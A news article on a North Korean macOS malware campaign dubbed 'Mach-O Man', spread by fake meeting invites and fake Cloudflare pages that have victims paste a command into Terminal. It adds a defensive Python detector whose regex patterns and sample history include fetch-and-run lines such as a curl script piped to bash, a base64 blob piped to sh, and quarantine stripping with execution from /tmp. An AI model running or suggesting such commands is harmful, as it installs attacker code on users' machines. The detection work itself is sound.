macOS users are at risk.
The Lazarus Group has found a new way to infiltrate victims' systems through regular work calls, according to cybersecurity expert Mauro Eldritch.
#Lazarus is back with a new macOS malware kit.
Made up of multiple Mach-O binaries, we named it "Mach-O Man". It is being distributed via #ClickFix in the crypto ecosystem to steal secrets.
Read my full article for ANY RUN below. #DPRK #Malware https://t.co/9yDesUCeMD pic.twitter.com/XD5w4kn0gh
Mauro Eldritch (@MauroEldritch), April 21, 2026
According to Eldritch's write-up, North Korean hackers have launched a campaign using a modular macOS toolkit dubbed Mach-O Man, attributed to Famous Chollima, another North Korean hacking group.
The toolkit consists of native Mach-O binaries built for macOS, the platform many crypto and fintech teams work on.
Mach-O Man is delivered through ClickFix, a social engineering technique in which the victim is asked to paste a command into the terminal to "fix a connection issue".
Eldritch explained that hackers send users an "urgent" meeting invitation via Zoom, Microsoft Teams, or Google Meet through Telegram.
Example of a hacker's message on Telegram. Source: Any.run.
The link leads to a phishing site that tells the user to copy a short command and paste it into the Mac terminal. Running that command installs the malware, and through it the attackers gain access to corporate systems, SaaS platforms, and financial accounts.
Often, breaches are discovered too late to prevent damage.
Researcher Vladimir S. noted that there are several variations of the attack described by Eldritch.
I also once saw a slightly different variation of the attack where the attackers hijacked the DeFi project's domain and replaced the website with a fake message from Cloudflare asking users to enter a command to grant access. A lot of people fell for it.
I also saw an attack in…
Vladimir S. | Officer's Notes (@officer_secret), April 21, 2026
In that variant, the attackers seized a DeFi project's own domain and replaced the site with a fake Cloudflare message asking visitors to run a command to "grant access", so the lure arrived from a domain users already trusted.
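Both lures described above, the "urgent" meeting invite and the fake Cloudflare page, end the same way: the victim pastes a one-liner into Terminal. A check a defender can run today is to scan shell history or EDR command-line telemetry for the shapes those one-liners take (a remote script piped into a shell, a base64 blob decoded into an interpreter, the quarantine attribute stripped, execution out of a temp directory). The Python script below is an added example written for this article; it is not code from the ANY.RUN write-up or from the malware, and the indicator names, regular expressions, URLs, file names and sample history lines are all constructed for illustration and are not the real Mach-O Man command.

```python
import re
from typing import Dict, List, Tuple

# Indicator patterns for ClickFix-style "paste this into Terminal" lures.
# The names are labels chosen for this example, not a vendor taxonomy.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    # A remote script fetched with curl/wget and piped straight into a shell.
    ("remote_fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # A base64 blob decoded and fed to an interpreter, hiding the real command.
    ("base64_decode_to_interpreter",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;]*\|\s*(sudo\s+)?((ba|z|da)?sh|python3?|perl)\b")),
    # Gatekeeper's quarantine attribute stripped from a downloaded file.
    ("quarantine_attr_removed",
     re.compile(r"\bxattr\b[^;|]*(com\.apple\.quarantine|\s-c\b)")),
    # Shell evaluation of dynamically built text.
    ("eval_of_dynamic_text", re.compile(r"\beval\s+[\"'$`]")),
    # AppleScript run from the command line (often used for fake prompts).
    ("osascript_invocation", re.compile(r"\bosascript\s+-e\b")),
    # Something executed out of a temp directory.
    ("exec_from_temp_dir",
     re.compile(r"(^|[\s;&|])(/tmp|/private/tmp|/var/tmp|\$TMPDIR)/[^\s;&|]+")),
]


def classify_command(cmd: str) -> List[str]:
    """Return the names of every indicator that fires on one command line."""
    return [name for name, pattern in INDICATORS if pattern.search(cmd)]


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Scan shell-history or EDR command lines; return one hit per flagged line."""
    hits: List[Dict[str, object]] = []
    for lineno, raw in enumerate(lines, start=1):
        cmd = raw.strip()
        if not cmd:
            continue
        indicators = classify_command(cmd)
        if indicators:
            hits.append({"line": lineno, "command": cmd, "indicators": indicators})
    return hits


# Constructed sample history for the demo; the URLs, file names and payload
# are invented and are not the real Mach-O Man lure.
SAMPLE_SHELL_HISTORY = [
    "git status",
    "curl -fsSL https://fix.example.invalid/meet-fix.sh | bash",
    "curl -sS https://example.invalid/release.tar.gz -o release.tar.gz",
    "echo aGVsbG8= | base64 -d | sh",
    "xattr -d com.apple.quarantine /tmp/MeetHelper && /tmp/MeetHelper",
    "brew install jq",
]


if __name__ == "__main__":
    for hit in scan_history(SAMPLE_SHELL_HISTORY):
        print(f"line {hit['line']}: {', '.join(hit['indicators'])}")
        print(f"    {hit['command']}")
```

To run it against a real machine, feed it the lines of `~/.zsh_history` or `~/.bash_history` (the zsh extended-history prefix `: <timestamp>:<elapsed>;` passes through untouched, since the patterns search anywhere in the line) or the command-line field of your EDR's process telemetry. Treat hits as triage signals rather than verdicts: a plain download with `-o` does not fire, but legitimate `curl ... | bash` installers do, so the value is in who ran the command and what it fetched.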
"What makes Lazarus particularly dangerous right now is their level of activity. Kelp, Drift and now the new macOS arsenal, all within a month. These are not random hacks, but a state-sponsored financial operation operating at a scale and pace characteristic of institutions," said Natalie Newson, a senior blockchain security researcher at CertiK.
In April, an Ethereum Foundation fellow identified 100 North Korean IT agents in Web3 companies.
Previously, a network of North Korean specialists in the crypto industry was also discovered by an on-chain detective.
